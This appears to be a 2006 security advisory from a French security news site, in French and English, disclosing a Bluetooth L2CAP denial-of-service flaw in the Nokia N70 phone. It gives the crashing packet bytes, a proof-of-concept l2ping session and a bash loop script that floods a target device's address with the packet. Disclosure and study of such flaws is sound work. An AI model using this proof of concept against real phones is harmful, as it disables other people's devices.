Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- outil
- attaque
- réseau


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Bee Ware analyse la liste des failles Internet les plus couramment utilisées
- Box acquiert la startup française Folders
- Buffalo annonce la disponibilité de la LinkStation Pro Quad en chassis vide
- Les derniers firewalls de Stonesoft désormais disponibles dans le CloudStore d'Interoute
- F5 optimise la gestion du trafic applicatif dans le Cloud avec BIG-IQ
- Les entreprises ne migreront pas vers Windows 8, selon Forrester
- RSA Phishing, vos impôts en ligne de mire
- Rapport Symantec sur les menaces de sécurité Internet 2012 augmentation du cyber-espionnage et multiplication par trois des attaques ciblant les PME
- Le rapport Lescure
- Une étude d'Iron Mountain révèle les postes qui communiquent plus volontiers des informations sensibles sur leur entreprise et leurs collègues
- Phishers New Fake Social Media Apps
- Spammers Targetting Oklahoma Tornado Victims
- Bitdefender reçoit sa 16ème certification VB100 par Virus Bulletin
- Les Etats-Unis craignent des cyberattaques puissantes
- Le CLUSIF crée un nouveau groupe de travail dédié à la sécurité des systèmes industriels SCADA

Dernier articles de SecuObs :
- Embedded à Cansecwest 2013
- Une belle série de conférences pour le printemps
- La conférence Cansecwest 2013 va bientôt avoir lieu
- FIC 2013, vers une prise de conscience politique de l'échec de la sécurité informatique
- Un Botnet utilisant le réseau d’anonymisation et les services cachés de Tor
- Nouveau vecteur d’exploitation sur les tablettes Samsung Galaxy S2 et Galaxy Note 2
- Version Beta publiée pour Qubes 2, AppVMs Windows supportées
- Mayhem, une preuve de concept pour des fraudes financières via Microsoft Dynamics GP
- STIX standardise l’échange des informations relatives aux attaques cybernétiques
- Avec VET, le DARPA se charge de vérifier l’intégrité des périphériques et des logiciels

Revue de presse internationale :
- The Adafruit RFID Breakout Board Wand for MakerBot by Miax 3dthursday
- Printing Large Scale Solar Cells
- BIOSTAGOG 3d
- Schweizerische Eidgenossenschaft Virus
- Adware.Yabector
- Important Strategies to Follow For Financial Success
- An Analysis Of Fast Advice Of Fagforening
- The best Question You Must Ask For mobiloans cash
- Immediate Solutions For Debt Review Insights
- Turncoats How the Taliban Undermines and Infiltrates the Afghan Local Police
- The dangers of downloading software from unofficial sites
- Huawei reverse engineering legacy and new network elements surprises
- Mac Spyware Bait Lebenslauf für Praktitkum
- Twitter Adds SMS As Second Factor Of Authentication
- The audacious plan to end hunger with 3-D printed food 3dthursday

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- [Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing
- Webshag, un outil d'audit de serveur web
- [Trames et paquets de données avec Scapy – Partie 4] Captures de données
- Shodan un moteur de recherche permettant de cibler des éléments potentiellement exploitables
- How to install USBsploit 0.6 BETA through SVN, the tar.gz, the .run or to work with original Metasploit
- [Ettercap – Partie 4] Contre-mesures, conclusion et webographie
- Embedded à Cansecwest 2013
- La sécurité des clés USB mise à mal par USBDUMPER
- [IDS Snort Windows – Partie 2] Installation et configuration
- [IDS Snort Windows – Partie 3] Exemple de fichier de configuration

Top bi-hebdo de la revue de presse
- Comprendre ce à  quoi servent __cdecl et __stdcall en langage C, ainsi que leurs différences
- CVE-2013-1656
- LulzSec group sentenced hacker combats child porn allegations
- ESET et Sucuri découvrent une faille sur les serveurs Apache
- Crimepack 1.3.1 Exploit kit information
- Bitcoins manque de pot, un impô't jackpot
- Numéricable escroquerie à  la non restitution de matériel imaginaire poke SAV_numericable
- Cassidian-Arkoon, mariage officialisé
- Vote for Naked Security in the European Security Blogger Awards
- Nobody reads the ToS not even those who write them

Top bi-hebdo de l'annuaire des videos
- Backdooring a XP machine using meterpreters persistence script
- H Botnet Botnet DDoS attack Botnet
- Freeradius installation and configuration
- Tutorial 15 pfSense Squid Squidguard Content filtering
- Pfsense Instalaci n y Configuraciones Basicas Parte 1
- configuration in gns3 dual wan setup and vmware pfsense 2 0 lusca cache
- How to enable Internet Access to the Local Network in Squid Proxy Server
- DrayTek to pFsense IPSEC VPN
- Avoir des donuts illimit s sur le jeu Simpsons Springfield
- install zeus botnet

Top bi-hebdo de la revue Twitter
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- An inexpensive proxy service called is actually a front for #malware distribution -
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @fpalumbo: Cisco consistently leading the way – buys vCider to boost its distributed cloud vision #CiscoONE

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

Failles

English version with Google Translate

[Infratech - vulnérabilité] Un Deuxième type de Déni de Service sur NOKIA N70

Par Pierre Betouin, secuobs.com
Le 15/02/2006


Résumé : Un deuxième type de Déni de Service a été identifié sur le modèle N70 des téléphones portables de la marque Nokia. Cette faille, trouvée à l'aide de Bluetooth Stack Smasher, permet de rendre inutilisable ce type de téléphones. - Lire l'article



[Version francaise] - [English version]

La plupart des téléphones mobiles de la marque Nokia sont vendus avec des fonctions Bluetooth. Ces fonctions ne sont pas activées par défaut.

Plus d'informations sur les téléphones de cette marque sur lien

L'envoi de paquets malformés peut provoquer sur les modèles n70 de la marque un Déni de Service (DoS) au minimum, cette faille a été trouvée avec l'utilitaire de fuzzing Bluetooth Stack Smasher v0.6 (cf. nouvelle version BSS 0.8 sur lien ).

Lors de la réception de nombreux paquets malformés de type L2CAP, le téléphone cellulaire Nokia n70 peut voir son activité ralentie puis figée (freeze) au bout d'une période de 30 secondes environ. La seule manière de reprendre la main étant alors de stopper le téléphone via le bouton d'arrêt/démarrage qui se fait surement par l'envoi d'une interruption RT.

Le paquet L2CAP responsable du DoS est le suivant :

7D AF 00 00 41 41 41

Avec :

Code field 0x7D (1 byte)
Ident field 0xAF (1 byte)
Length field 0x0000 (2 bytes)

0x41 représentant les octects de remplissage aléatoire (padding)

D'autres modèles de la marque Nokia peuvent être affectés, ils doivent être testés avec l'utilitaire de fuzzing précédemment cité BSS.

Aucune mise à jour du "Firmware" (logiciel embarqué) n'est disponible pour le moment, la seule solution envisageable est de désactiver les fonctions Bluetooth lorsque vous n'en avez pas besoin.

Un nouveau "Firmware" sera peut être mis à disposition par le constructeur sous peu.

Proof of Concept :
------------------
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss

# ./loop.sh 00:15:A0:XX:XX:XX
(.. snip ..)

# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:15:A0:XX:XX:XX id 0
1 sent, 0 received, 100% loss

Loop.sh étant le suivant :

#!/bin/bash
# Another Nokia N70 Bluetooth remote Denial of Service
# Pierre Betouin pierre.betouin@infratech.fr
# Feb 14 11:21:58 GMT+1 2006

echo "Another Nokia N70 Bluetooth remote Denial of Service"
echo "Pierre Betouin pierre.betouin@infratech.fr"
echo ""
if (( $# < 1 )); then
echo "Usage: $0 <btdaddr> (uses replay_l2cap_packet_nokiaN70)"
exit
fi

if [ -x ./replay_l2cap_packet_nokiaN70 ]; then
echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."
echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"
echo ""
read
while (( 1 )); do # Infinite loop, a bit dirty, we must say ;)
./replay_l2cap_packet_nokiaN70 $1
done
else
echo "You must compile replay_l2cap_packet_nokiaN70 before"
echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c"
exit

fi


Vous pouvez télécharger replay_l2cap_packet_nokiaN70.c sur lien


Autres ressources sur la sécurité Bluetooth :

[Dossier Sécurité Bluetooth - partie 1] Introduction aux technologies Bluetooth lien

[Dossier Sécurité Bluetooth - partie 2] Présentation des utilitaires Bluetooth lien

[Dossier Sécurité Bluetooth - partie 3] Les attaques génériques lien

[Dossier Sécurité Bluetooth - partie 4] Les attaques d'implémentations lien

[Dossier Sécurité Bluetooth - partie 5] Scénarios possibles & synthèse lien

[Infratech - vulnérabilité] PoC pour le DoS sur les téléphones portables Sony/Ericsson lien

[Infratech - vulnérabilité] Déni de Service sur les téléphones mobiles Sony/Ericsson lien

[Infratech - vulnérabilité] PoC pour le DoS sur hcidump lien

[Infratech - vulnérabilité] Déni de Service sur hcidump lien

[Infratech - release] BSS - Bluetooth Stack Smasher v0.6 lien

[Infratech - vulnérabilité] Déni de Service sur Nokia N70 lien


[English Version] - [Version francaise]


Most of Nokia cell phones sold now are Bluetooth compliant. Bluetooth is not enabled by default.
Lots of users use it with several other devices (earsets, GPS systems, and so on).

More information about these devices on lien

Bluetooth technology uses at the lowest level a L2CAP layer for multiplexing and "access to media" purposes.

Other upper protocols, such as RFCOMM or SDP, use it for instance.

Malformed packets can lead to, at least, a denial of service on affected devices. This flaw was found using the BSS tool ( Bluetooth Stack Smasher new release v0.8 : lien ).

When receiving numerous short buggy L2CAP packets, Nokia N70 cellular phones begin to be slower and then freeze after a short period (within 30 seconds). The only available button is the "halt button" located at the top of the phone (maybe controlled by a RT interruption) which allows users to shut down their device.

L2CAP packets responsible of the crash are :
7D AF 00 00 41 41 41

Where:
Code field 0x7D (1 byte)
Ident field 0xAF (1 byte)
Length field 0x0000 (2 bytes)

0x41 bytes are random padding.

Other Nokia devices may be affected and should be tested with BSS fuzzer. Solution is to switch off bluetooth on the phone. A firmware upgrade may be distributed later by Nokia.


Proof of Concept :
------------------
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss

# ./loop.sh 00:15:A0:XX:XX:XX
(.. snip ..)

# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:15:A0:XX:XX:XX id 0
1 sent, 0 received, 100% loss


Loop.sh as follows :

#!/bin/bash
# Another Nokia N70 Bluetooth remote Denial of Service
# Pierre Betouin pierre.betouin@infratech.fr
# Feb 14 11:21:58 GMT+1 2006

echo "Another Nokia N70 Bluetooth remote Denial of Service"
echo "Pierre Betouin pierre.betouin@infratech.fr"
echo ""
if (( $# < 1 )); then
echo "Usage: $0 <btdaddr> (uses replay_l2cap_packet_nokiaN70)"
exit
fi

if [ -x ./replay_l2cap_packet_nokiaN70 ]; then
echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."
echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"
echo ""
read
while (( 1 )); do # Infinite loop, a bit dirty, we must say ;)
./replay_l2cap_packet_nokiaN70 $1
done
else
echo "You must compile replay_l2cap_packet_nokiaN70 before"
echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c"
exit

fi


You can download replay_l2cap_packet_nokiaN70.c on lien


Author Website on lien




- Article suivant : [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Article précédent : [Infratech - vulnérabilité] Déni de Service sur NOKIA N70
- Article suivant dans la catégorie Failles : [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Article précédent dans la catégorie Failles : [Infratech - vulnérabilité] Déni de Service sur NOKIA N70

Les derniers commentaires publiés pour cet article:
- Nokia N70/N73 Bluetooth Stack OBEX Implementation Denial of Service ...

Les derniers commentaires de la catégorie Failles:
- ESRT @sambowne - Russian firm Elcomsoft unveils tool to crack BlackBerry encryption security ...
- SPIP recently fixed 2 vulnerabilities notified by Tehtri-Security 0day ...
- PuttyHijack session hijack POC ...
- ESRT @thierryzoller - Updated BEAST blog post with Proof of Concept code and the whitepaper ...
- ESRT @y0ug @Securelist - New article published: MYBIOS Is BIOS infection a reality ...

Les derniers articles de la catégorie Failles :
- Nouveau vecteur d’exploitation sur les tablettes Samsung Galaxy S2 et Galaxy Note 2
- Une porte dérobée SNMP dans les imprimantes Dell et Samsung
- Des compteurs électriques un peu trop bavards
- Une preuve de concept pour exploiter à distance un lecteur USB de cartes à puce
- Attaques cryptographiques de type Side-Channel entre des machines virtuelles
- Une présentation annulée lors de Toorcon 14 suite à la demande de Hewlett-Packard
- USB Stick of Death, élévation locale de privilèges via une clé USB au format NTFS
- Injections SQL au sein d’un produit SCADA se destinant aux centrales solaires photovoltaïques
- Une preuve de concept pour du Phishing abusant de l’API FullScreen d’HTML5
- Vulnérabilité du protocole d authentification au sein des versions courantes d Oracle




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :